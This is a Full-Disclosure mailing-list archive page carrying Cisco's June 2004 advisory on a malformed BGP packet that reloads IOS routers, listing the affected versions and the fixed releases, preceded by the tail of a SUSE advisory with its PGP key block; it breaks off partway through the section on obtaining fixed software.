    SUSE's security contact is <securitysuse.com> or <securitysuse.de>.
    The <securitysuse.de> public key is listed below.
    =====================================================================
______________________________________________________________________________

    The information in this advisory may be distributed or reproduced,
    provided that the advisory is not modified in any way. In particular,
    it is desired that the clear-text signature must show proof of the
    authenticity of the text.
    SUSE Linux AG makes no warranties of any kind whatsoever with respect
    to the information contained in this security advisory.

Type Bits/KeyID Date User ID
pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <securitysuse.de>
pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <buildsuse.de>

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

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
DgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE=
=LRKC
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)

iQEVAwUBQNBTgney5gA9JdPZAQHB7Af/XRy01sYB1rDi0L+TwlQtW4nr4vwrJTOt
6pA/M+oNsW0SUPK3kCcN+v7mvuIrA69c1VZeYgfI4/dy0bdMntcVkOliikn0+m0i
e2SvKYY+/KC8wZaUIrKFbH4PA0Gdf40GmNVj4uq5KdwohJLGQDTa8eguiYocMjXv
E8QAdGTaPXEBGz8Ode6YMYAbauHbWXip9x6TyQ7NgiQ4mylabmmw8AUebVyM4oWS
a28uoT8nWPu+BwYNW0zt26clPhLvmHWFpIpqyaWERaWMuCrFHwlc753B2PCOVdnm
Yj/ugqlkkGRysclITz3WFbUGUKtd91AdZAEK6l+MxkuqRDZmNUYgHw==
=q9W1
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Cisco Security Advisory: Cisco IOS Malformed BGP packet causes reload

From: Cisco Systems Product Security Incident Response Team (psirtcisco.com)
Date: Wed Jun 16 2004 - 10:00:00 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco IOS Malformed BGP Packet Causes Reload

Revision 1.0
============

Last Updated June 16 15:00 UTC (GMT)

For Public Release 2004 June 16 15:00 UTC (GMT)

- -------------------------------------------------------------------------------

Please provide your feedback on this document.

- -------------------------------------------------------------------------------

Contents

    Summary
    Affected Products
    Details
    Impact
    Software Versions and Fixes
    Obtaining Fixed Software
    Workarounds
    Exploitation and Public Announcements
    Status of This Notice: FINAL
    Distribution
    Revision History
    Cisco Security Procedures

- -------------------------------------------------------------------------------

Summary
=======

A Cisco device running IOS and enabled for the Border Gateway Protocol (BGP) is
vulnerable to a Denial of Service (DOS) attack from a malformed BGP packet. The
BGP protocol is not enabled by default, and must be configured in order to
accept traffic from an explicitly defined peer. Unless the malicious traffic
appears to be sourced from a configured, trusted peer, it would be difficult to
inject a malformed packet.

Cisco has made free software available to address this problem.

This advisory is available at
http://www.cisco.com/warp/public/707/cisco-sa-20040616-bgp.shtml.

Affected Products
=================

Vulnerable Products

This issue affects all Cisco devices running any unfixed version of Cisco IOS
code and configured for BGP routing.

A router which is running the BGP process will have a line in the config
defining the AS number, which can be seen by issuing the command show
running-config:

router bgp <AS number>

This vulnerability is present in any unfixed version of IOS, from the beginning
of support for the BGP protocol, including versions 9.x, 10.x, 11.x and 12.x.

To determine the software running on a Cisco product, log in to the device and
issue the show version command to display the system banner. Cisco IOS software
will identify itself as "Internetwork Operating System Software" or simply "IOS
®." On the next line of output, the image name will be displayed between
parentheses, followed by "Version" and the IOS release name. Other Cisco
devices will not have the show version command or will give different output.

The following example identifies a Cisco product running IOS release 12.0(3)
with an installed image name of C2500-IS-L:

    Cisco Internetwork Operating System Software IOS (TM)

    2500 Software (C2500-IS-L), Version 12.0(3), RELEASE SOFTWARE

The release train label is "12.0."

The next example shows a product running IOS release 12.0(2a)T1 with an image
name of C2600-JS-MZ:

Cisco Internetwork Operating System Software IOS (tm)
C2600 Software (C2600-JS-MZ), Version 12.0(2a)T1, RELEASE SOFTWARE (fc1)

Additional information about Cisco IOS release naming can be found at
http://www.cisco.com/warp/public/620/1.html.

Products Confirmed Not Vulnerable

Products confirmed not to be vulnerable include devices which cannot
participate in BGP or cannot be configured for BGP.

Details
=======

The Border Gateway Protocol (BGP) is a routing protocol defined by RFC 1771,
and designed to manage IP routing in large networks. An affected Cisco device
running a vulnerable version of Cisco IOS software and enabling the BGP
protocol will reload when a malformed BGP packet is received. BGP runs over
TCP, a reliable transport protocol which requires a valid three way handshake
before any further messages will be accepted. The Cisco IOS implementation of
BGP requires the explicit definition of a neighbor before a connection can be
established, and traffic must appear to come from that neighbor. These
implementation details make it very difficult to send a BGP packet to a Cisco
IOS device from an unauthorized source.

A Cisco device receiving an invalid BGP packet will reset and may take several
minutes to become fully functional. This vulnerability may be exploited
repeatedly resulting in an extended DOS attack. This issue is documented in bug
IDs CSCdu53656 and CSCea28131.

Impact
======

Successful exploitation of this vulnerability results in a reload of the
device. Repeated exploitation could result in a sustained DoS attack.

Software Versions and Fixes
===========================

Note: Many of the releases in this table were fixed prior to the release of
other IOS advisories. Read the table carefully to determine if your IOS release
contains these fixes. Most fixed releases for the TCP and SNMP advisories such
as http://www.cisco.com/warp/public/707/cisco-sa-20040420-snmp.shtml and
http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml
contained the fixes for this BGP advisory.

Each row of the Cisco IOS software table (below) describes a release train and
the platforms or products for which it is intended. If a given release train is
vulnerable, then the earliest possible releases that contain the fix (the
"First Fixed Release") and the anticipated date of availability for each are
listed in the "Rebuild," "Interim," and "Maintenance" columns. A device running
a release in the given train that is earlier than the release in a specific
column (less than the First Fixed Release) is known to be vulnerable. The
release should be upgraded at least to the indicated release or a later version
(greater than or equal to the First Fixed Release label). When selecting a
release, keep in mind the following definitions:

Maintenance

Most heavily tested, stable, and highly recommended release of a release train
in any given row of the table.

Rebuild

Constructed from the previous maintenance or major release in the same train,
it contains the fix for a specific defect. Although it receives less testing,
it contains only the minimal changes necessary to repair the vulnerability.

Interim

Built at regular intervals between maintenance releases and receives less
testing. Interims should be selected only if there is no other suitable release
that addresses the vulnerability. Interim images should be upgraded to the next
available maintenance release as soon as possible. Interim releases are not
available through manufacturing, and usually they are not available for
customer download from Cisco.com without prior arrangement with the Cisco TAC.

In all cases, customers should exercise caution to confirm that the devices to
be upgraded contain sufficient memory and that current hardware and software
configurations will continue to be supported properly by the new software
release. If the information is not clear, contact the Cisco TAC for assistance
as shown in the Obtaining Fixed Software section below.

More information on Cisco IOS software release names and abbreviations is
available at http://www.cisco.com/warp/public/620/1.html.

The fixes will be available at the Software Center located at
http://www.cisco.com/tacpage/sw-center/.

For software installation and upgrade procedures, see
http://www.cisco.com/warp/public/130/upgrade_index.shtml.

For a current view of all posted and repaired images for Cisco IOS, please
check the listing available to registered Cisco.com users at:
http://www.cisco.com/tacpage/sw-center/sw-ios.shtml.

+------------------------------------------------+
| Major | Availability of Repaired Releases |
| Release | * |
|------------+-----------------------------------|
| Affected | | Interim | |
| 11.1-Based | Rebuild | ** | Maintenance |
| Release | | | |
|------------+-----------------------------------|
| 11.1 | Migrate to 11.2 or later |
|------------+-----------------------------------|
| 11.1AA | Migrate to 11.2P or later |
|------------+-----------------------------------|
| 11.1CA | Migrate to 12.0 or later |
|------------+-----------------------------------|
| 11.1CC | Migrate to 12.0 or later |
|------------+-----------------------------------|
| Affected | | Interim | |
| 11.2-Based | Rebuild | ** | Maintenance |
| Release | | | |
|------------+-----------+---------+-------------|
| 11.2 | 11.2(26g) | | |
|------------+-----------+---------+-------------|
| 11.2P | 11.2(26) | | |
| | P7 | | |
|------------+-----------------------------------|
| 11.2SA | Not Vulnerable |
|------------+-----------------------------------|
| Affected | | Interim | |
| 11.3-Based | Rebuild | ** | Maintenance |
| Release | | | |
|------------+-----------+---------+-------------|
| 11.3 | 11.3(11f) | | |
|------------+-----------+---------+-------------|
| 11.3T | 11.3(11b) | | |
| | T5 | | |
|------------+-----------+---------+-------------|
| Affected | | Interim | |
| 12.0-Based | Rebuild | ** | Maintenance |
| Release | | | |
|------------+-----------+---------+-------------|
| 12.0 | | | 12.0(27) |
|------------+-----------------------------------|
| 12.0DA | Migrate to 12.2DA or later |
|------------+-----------------------------------|
| | 12.0(21) | | |
| | S7 | | |
| |-----------+---------+-------------|
| | 12.0(22) | | |
| | S2e | | |
| |-----------+---------+-------------|
| | 12.0(22) | | |
| | S3c | | |
| |-----------+---------+-------------|
| | 12.0(22) | | |
| | S4a | | |
| |-----------+---------+-------------|
| 12.0S | 12.0(22) | | |
| | S5 | | |
| |-----------+---------+-------------|
| | 12.0(23) | | |
| | S3 | | |
| |-----------+---------+-------------|
| | 12.0(24) | | |
| | S2 | | |
| |-----------+---------+-------------|
| | 12.0(25) | | |
| | S1 | | |
| |-----------+---------+-------------|
| | | | 12.0(26)S |
|------------+-----------------------------------|
| 12.0SL | Migrate to 12.0(23)S3 or later |
|------------+-----------------------------------|
| | 12.0(17) | | |
| | ST10 | | |
| | Available | | |
| | upon | | |
| 12.0ST | request | | |
| |-----------+---------+-------------|
| | 12.0(21) | | |
| | ST7 | | |
| |-----------------------------------|
| | Migrate to 12.0(26)S2 or later |
|------------+-----------------------------------|
| 12.0SV | | | 12.0(27)SV |
|------------+-----------+---------+-------------|
| 12.0SX | 12.0(25) | | |
| | SX | | |
|------------+-----------+---------+-------------|
| | 12.0(23) | | |
| | SZ3 | | |
|12.0SZ |-----------+---------+-------------|
| | | | 12.0(26)SZ |
| |-----------------------------------|
| | Migrate to 12.0(26)S2 or later |
|------------+-----------------------------------|
| 12.0T | Migrate to 12.1 or later |
|------------+-----------------------------------|
| | 12.0(16) | | |
| | W5(21c) | | |
| |-----------+---------+-------------|
| | 12.0(25) | | |
| | W5(27b) | | |
|12.0W5 |-----------+---------+-------------|
| | 12.0(26) | | |
| | W5(28a) | | |
| |-----------+---------+-------------|
| | 12.0(27) | | |
| | W5(29) | | |
|------------+-----------------------------------|
| 12.0WC | Not Vulnerable |
|------------+-----------------------------------|
| 12.0WX | Migrate to 12.0W5 or later |
|------------+-----------------------------------|
| 12.0XA | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XC | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XD | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XE | Migrate to 12.1E latest or later |
|------------+-----------------------------------|
| 12.0XG | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XH | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XI | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XJ | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XK | Migrate to 12.1T latest or later |
|------------+-----------------------------------|
| 12.0XL | Migrate to 12.2 latest or later |
|------------+-----------------------------------|
| 12.0XN | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XP | Not Vulnerable |
|------------+-----------------------------------|
| 12.0XR | Migrate to 12.2 latest or later |
|------------+-----------------------------------|
| 12.0XS | Migrate to 12.1E latest or later |
|------------+-----------------------------------|
| 12.0XU | Not Vulnerable |
|------------+-----------------------------------|
| Affected | | Interim | |
| 12.1-Based | Rebuild | ** | Maintenance |
| Release | | | |
|------------+-----------+---------+-------------|
| 12.1 | | | 12.1(20) |
|------------+-----------------------------------|
| 12.1AA | Migrate to 12.2 latest or later |
|------------+-----------------------------------|
| | Not Vulnerable |
|12.1AX |-----------------------------------|
| | 12.1AY | Not Vulnerable |
|------------+-----------+-----------------------|
| 12.1AZ | | | 12.1(14)AZ |
|------------+-----------------------------------|
| 12.1DA | Migrate to 12.2DA or later |
|------------+-----------------------------------|
| 12.1DB | Migrate to 12.2B or later |
|------------+-----------------------------------|
| | 12.1(6) | | |
| | E12.0 | | |
| |-----------+---------+-------------|
| | 12.1(8b) | | |
| | E14 | | |
| |-----------+---------+-------------|
| | 12.1(11b) | | |
| | E12.0 | | |
| |-----------+---------+-------------|
| | 12.1(12c) | | |
| 12.1E | E7 | | |
| |-----------+---------+-------------|
| | 12.1(13) | | |
| | E6 | | |
| |-----------+---------+-------------|
| | 12.1(14) | | |
| | E4 | | |
| |-----------+---------+-------------|
| | 12.1(19)E | | |
| |-----------+---------+-------------|
| | | | 12.1(20)E |
|------------+-----------+---------+-------------|
| 12.1EA | 12.1(14) | | |
| | EA1 | | |
|------------+-----------+---------+-------------|
| 12.1EB | 12.1(14) | | |
| | EB1 | | |
|------------+-----------+---------+-------------|
| 12.1EC | | | 12.1(19)EC |
|------------+-----------+---------+-------------|
| 12.1EO | | | 12.1(19)EO |
|------------+-----------+---------+-------------|
| 12.1EV | 12.1(12c) | | |
| | EV2 | | |
|------------+-----------+---------+-------------|
| 12.1EW | | | 12.1(19)EW |
|------------+-----------------------------------|
| 12.1EX | Migrate to 12.1(14)E4 or later |
|------------+-----------------------------------|
| 12.1EY | Migrate to 12.1(14)E4 or later |
|------------+-----------------------------------|
| 12.1T | 12.1(5) | | |
| | T19 | | |
|------------+-----------------------------------|
| 12.1XA | Migrate to 12.1(5)T19 or later |
|------------+-----------------------------------|
| 12.1XB | Migrate to 12.1(5)T19 or later |
|------------+-----------------------------------|
| 12.1XC | Migrate to 12.1(5)T19 or later |
|------------+-----------------------------------|
| 12.1XD | Migrate to 12.2 or later |
|------------+-----------------------------------|
| 12.1XE | Migrate to 12.1E latest or later |
|------------+-----------------------------------|
| 12.1XF | Migrate to 12.2(4)T6 or later |
|------------+-----------------------------------|
| 12.1XG | Migrate to 12.2(4)T6 or later |
|------------+-----------------------------------|
| 12.1XH | Migrate to 12.2 or later |
|------------+-----------------------------------|
| 12.1XI | Migrate to 12.2 latest or later |
|------------+-----------------------------------|
| 12.1XJ | Migrate to 12.2(4)T6 or later |
|------------+-----------------------------------|
| 12.1XL | Migrate to 12.2T latest or later |
|------------+-----------------------------------|
| 12.1XM | Migrate to 12.2T latest or later |
|------------+-----------------------------------|
| 12.1XP | Migrate to 12.2(4)T6 or later |
|------------+-----------------------------------|
| 12.1XQ | Migrate to 12.2T latest or later |
|------------+-----------------------------------|
| 12.1XR | Migrate to 12.2T latest or later |
|------------+-----------------------------------|
| 12.1XT | Migrate to 12.2(4)T6 or later |
|------------+-----------------------------------|
| 12.1XU | Migrate to 12.2T latest or later |
|------------+-----------------------------------|
| 12.1XV | Migrate to 12.2XB or later |
|------------+-----------------------------------|
| 12.1XY | Migrate to 12.2XB or later |
|------------+-----------------------------------|
| 12.1YA | Migrate to 12.2(8)T10 or later |
|------------+-----------------------------------|
| 12.1YB | Migrate to 12.2(4)T6 or later |
|------------+-----------------------------------|
| 12.1YC | Migrate to 12.2(8)T10 or later |
|------------+-----------------------------------|
| 12.1YD | Migrate to 12.2(8)T10 or later |
|------------+-----------------------------------|
| 12.1YH | Migrate to 12.2(13)T5 or later |
|------------+-----------------------------------|
| 12.1YJ | Not Vulnerable |
|------------+-----------------------------------|
| Affected | | Interim | |
| 12.2-Based | Rebuild | ** | Maintenance |
| Release | | | |
|------------+-----------+---------+-------------|
| | 12.2(10d) | | |
| |-----------+---------+-------------|
| | 12.2(12e) | | |
| |-----------+---------+-------------|
| | 12.2(12h) | | |
| 12.2 | M1 | | |
| |-----------+---------+-------------|
| | 12.2(13c) | | |
| |-----------+---------+-------------|
| | 12.2(16a) | | |
| |-----------+---------+-------------|
| | | | 12.2(17) |
|------------+-----------+---------+-------------|
| 12.2B | 12.2(15) | | |
| | B1 | | |
|------------+-----------+---------+-------------|
| 12.2BC | 12.2(15) | | |
| | BC1 | | |
|------------+-----------------------------------|
| 12.2BW | Migrate to 12.2(15)T12 or later |
|------------+-----------------------------------|
| 12.2BX | | | 12.2(16)BX |
|------------+-----------------------------------|
| 12.2BY | Migrate to 12.2(15)B1 or later |
|------------+-----------------------------------|
| 12.2BZ | Migrate to 12.2(16)BX or later |
|------------+-----------------------------------|
| 12.2CX | | | 12.2(15)CX |
|------------+-----------+---------+-------------|
| 12.2DA | 12.2(12) | | |
| | DA6 | | |
|------------+-----------------------------------|
| 12.2DD | Migrate to 12.2(15)B1 or later |
|------------+-----------------------------------|
| 12.2DX | Migrate to 12.2(15)B1 or later |
|------------+-----------------------------------|
| 12.2EW | | | 12.2(18)EW |
|------------+-----------+---------+-------------|
| 12.2JA | | | 12.2(13)JA |
|------------+-----------+---------+-------------|
| | 12.2(14) | | |
| 12.2S | S2 | | |
| |-----------+---------+-------------|
| | | | 12.2(18)S |
|------------+-----------+---------+-------------|
| 12.2SE | | | 12.2(18)SE |
|------------+-----------+---------+-------------|
| 12.2SU | | | 12.2(14)SU |
|------------+-----------+---------+-------------|
| 12.2SV | | | 12.2(18)SV |
|------------+-----------+---------+-------------|
| 12.2SW | | | 12.2(18)SW |
|------------+-----------+---------+-------------|
| 12.2SX | 12.2(14) | | |
| | SX2 | | |
|------------+-----------+---------+-------------|
| 12.2SXA | 12.2(17b) | | |
| | SXA | | |
|------------+-----------+---------+-------------|
| 12.2SXB | 12.2(17d) | | |
| | SXB | | |
|------------+-----------+---------+-------------|
| 12.2SY | | | 12.2(14)SY |
|------------+-----------+---------+-------------|
| 12.2SZ | 12.2(14) | | |
| | SZ2 | | |
|------------+-----------+---------+-------------|
| | 12.2(4)T6 | | |
| |-----------+---------+-------------|
| | 12.2(8) | | |
| | T10 | | |
| |-----------+---------+-------------|
| | 12.2(11) | | |
| 12.2T | T9 | | |
| |-----------+---------+-------------|
| | 12.2(13) | | |
| | T5 | | |
| |-----------+---------+-------------|
| | 12.2(15) | | |
| | T4 | | |
|------------+-----------------------------------|
| 12.2XA | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XB | 12.2(2) | | |
| | XB16 | | |
|------------+-----------------------------------|
| 12.2XD | Migrate to 12.2(8)T10 or later |
|------------+-----------------------------------|
| 12.2XE | Migrate to 12.2(8)T10 or later |
|------------+-----------------------------------|
| 12.2XG | Migrate to 12.2(8)T10 or later |
|------------+-----------------------------------|
| 12.2XH | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XI | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XJ | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XK | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XL | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2XM | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2XN | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XQ | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XS | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XT | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2XU | Migrate to 12.2(15)T12 or later |
|------------+-----------------------------------|
| 12.2XW | Migrate to 12.2(11)T9 or later |
|------------+-----------------------------------|
| 12.2YA | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2YB | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2YC | Migrate to 12.2(11)T11 or later |
|------------+-----------------------------------|
| 12.2YD | Migrate to 12.2(8)YY or later |
|------------+-----------------------------------|
| 12.2YE | Migrate to 12.2S or later |
|------------+-----------------------------------|
| 12.2YF | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2YG | Migrate to 12.2(13)T5 or later |
|------------+-----------------------------------|
| 12.2YH | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2YJ | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2YL | Migrate to 12.3(2)T or later |
|------------+-----------------------------------|
| 12.2YM | Migrate to 12.3(2)T or later |
|------------+-----------------------------------|
| 12.2YN | Migrate to 12.3(2)T or later |
|------------+-----------------------------------|
| 12.2YO | Migrate to 12.2(14)SY or later |
|------------+-----------------------------------|
| 12.2YP | 12.2(11) | | |
| | YP1 | | |
|------------+-----------------------------------|
| 12.2YQ | Migrate to 12.3(4)T or later |
|------------+-----------------------------------|
| 12.2YR | Migrate to 12.3(4)T or later |
|------------+-----------------------------------|
| 12.2YS | Migrate to 12.3T or later |
|------------+-----------------------------------|
| 12.2YT | Migrate to 12.2(15)T4 or later |
|------------+-----------------------------------|
| 12.2YU | Migrate to 12.3(4)T or later |
|------------+-----------------------------------|
| 12.2YV | Migrate to 12.3(4)T or later |
|------------+-----------------------------------|
| 12.2YW | Migrate to 12.3(2)T or later |
|------------+-----------------------------------|
| 12.2YX | Migrate to 12.2(14)SU or later |
|------------+-----------------------------------|
| 12.2YY | 12.2(8) | | |
| | YY3 | | |
|------------+-----------------------------------|
| 12.2YZ | Migrate to 12.2(14)SZ or later |
|------------+-----------------------------------|
| 12.2ZA | 12.2(14) | | |
| | ZA2 | | |
|------------+-----------------------------------|
| 12.2ZB | Migrate to 12.3T or later |
|------------+-----------------------------------|
| 12.2ZC | Migrate to 12.3T or later |
|------------+-----------------------------------|
| 12.2ZE | Migrate to 12.3 or later |
|------------+-----------------------------------|
| 12.2ZF | Migrate to 12.3(4)T or later |
|------------+-----------------------------------|
| 12.2ZG | Migrate to 12.3(4)T or later |
|------------+-----------------------------------|
| 12.2ZH | Migrate to 12.3(4)T or later |
|------------+-----------------------------------|
| 12.2ZI | Migrate to 12.2(18)S or later |
|------------+-----------------------------------|
| 12.2ZK | | | 12.2(15)ZK |
|------------+-----------+---------+-------------|
| 12.2ZL | | | 12.2(15)ZL |
|------------+-----------------------------------|
| 12.2ZN | Migrate to 12.3(2)T or later |
|------------+-----------------------------------|
| 12.2ZO | | | 12.2(15)ZO |
|------------+-----------+---------+-------------|
| 12.2ZP | | | 12.2(13)ZP |
|------------+-----------+---------+-------------|
| Affected | | Interim | |
| 12.3-Based | Rebuild | ** | Maintenance |
| Release | | | |
|------------+-----------------------------------|
| 12.3 | Not Vulnerable |
|------------+-----------------------------------|
| 12.3T | Not Vulnerable |
+------------------------------------------------+

Obtaining Fixed Software
========================

Customers with Service Contracts

Customers with contracts should obtain upgraded software through their regular
update channels. For most customers, this means that upgrades should be
obtained through the Software Center on Cisco's worldwide website at
http://www.cisco.com/tacpage/sw-center.

Customers using Third-party Support Organizations

Customers whose Cisco products are provided or maintained through prior or
